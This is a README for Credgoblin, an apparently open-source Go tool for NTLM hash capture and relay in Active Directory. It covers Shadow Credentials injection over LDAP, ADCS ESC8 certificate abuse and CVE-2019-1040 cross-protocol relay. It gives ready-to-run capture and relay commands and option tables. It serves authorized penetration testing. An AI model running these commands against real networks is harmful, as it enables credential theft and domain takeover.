NTLM Credential Interception & Relay Toolkit
High-performance Go-based tool for Active Directory security assessments
Features • Installation • Quick Start • Documentation
Credgoblin is a security assessment tool designed for capturing and relaying NTLM authentication in Active Directory environments. Built entirely in Go for performance and portability, it provides a unified solution for:
- Hash Capture — Intercept NTLMv2 credentials from SMB, HTTP, and HTTPS connections
- LDAP Relay — Perform Shadow Credentials attacks via
msDS-KeyCredentialLinkmodification - ADCS Relay — Exploit ESC8 misconfiguration through certificate enrollment abuse
- Cross-Protocol Relay — Chain SMB→LDAP, SMB→HTTP, and HTTP→LDAP attacks
| Capability | Description |
|---|---|
| Multi-Protocol Listeners | SMB (445), HTTP (80), HTTPS (443) with auto-generated TLS certificates |
| Hashcat Integration | Export NTLMv2 hashes in -m 5600 format |
| Shadow Credentials | LDAP/LDAPS relay with KeyCredential injection and PFX export |
| ADCS ESC8 | Certificate enrollment via web interface relay |
| CVE-2019-1040 | Drop-the-MIC implementation for cross-protocol attacks |
| SICILY Protocol | Native Microsoft LDAP NTLM authentication support |
- Go 1.23 or later
- Root/Administrator privileges (required for low ports)
- Platform — Linux, macOS, or Windows
git clone https://github.com/ineffectivecoder/credgoblin.git
cd credgoblin
go build -o credgoblin ./cmd/credgoblin# Listen on all protocols
sudo ./credgoblin capture -i 0.0.0.0
# HTTPS only (required for WebClient coercion)
sudo ./credgoblin capture -i 0.0.0.0 -p 443 -o hashes.txt# Relay to LDAP and inject Shadow Credentials
sudo ./credgoblin relay -t ldap://dc.domain.local \
-u 'CN=DC01,CN=Computers,DC=domain,DC=local'# Relay to ADCS web enrollment
sudo ./credgoblin relay -m adcs \
-t http://ca.domain.local/certsrv \
-T User| Option | Description | Default |
|---|---|---|
-i, --interface |
Listen address | 0.0.0.0 |
-p, --ports |
Ports (80, 443, 445, both, or comma-separated) |
both |
-o, --output |
Output file for hashes | hashes.txt |
-v, --verbose |
Enable verbose logging | false |
| Option | Description | Required |
|---|---|---|
-t, --target |
Target URL (ldap://, ldaps://, http://, https://) |
✓ |
-m, --mode |
Attack mode (ldap or adcs) |
— |
-u, --target-user |
Target Distinguished Name | LDAP mode |
-T, --template |
Certificate template name | ADCS mode |
-o, --output |
Output PFX path | — |
-P, --pfx-pass |
PFX password | — |
For detailed attack scenarios, technical implementation details, and protocol documentation, see the docs directory.
- Shadow Credentials — Inject
msDS-KeyCredentialLinkfor PKINIT-based authentication - ESC8 — Abuse misconfigured ADCS web enrollment for certificate issuance
- WebClient Abuse — Coerce HTTP authentication via WebDAV service
- Cross-Protocol Relay — Bypass signing requirements with CVE-2019-1040
| Limitation | Impact |
|---|---|
| SMB Signing Required | Relay attacks blocked |
| LDAP Signing Required | Domain controller relay blocked |
| EPA/Channel Binding | Server 2022+ may enforce by default |
| MIC Validation | Patched systems may validate MIC |
Inspired by and building upon research from:
- Impacket — ntlmrelayx reference
- Responder — Hash capture techniques
- PKINITtools — PKINIT authentication
- Certipy — ADCS attack research
For authorized security testing and research only.
Usage of this tool for attacking systems without prior mutual consent is illegal. The developer assumes no liability for misuse or damages.
MIT License • © 2024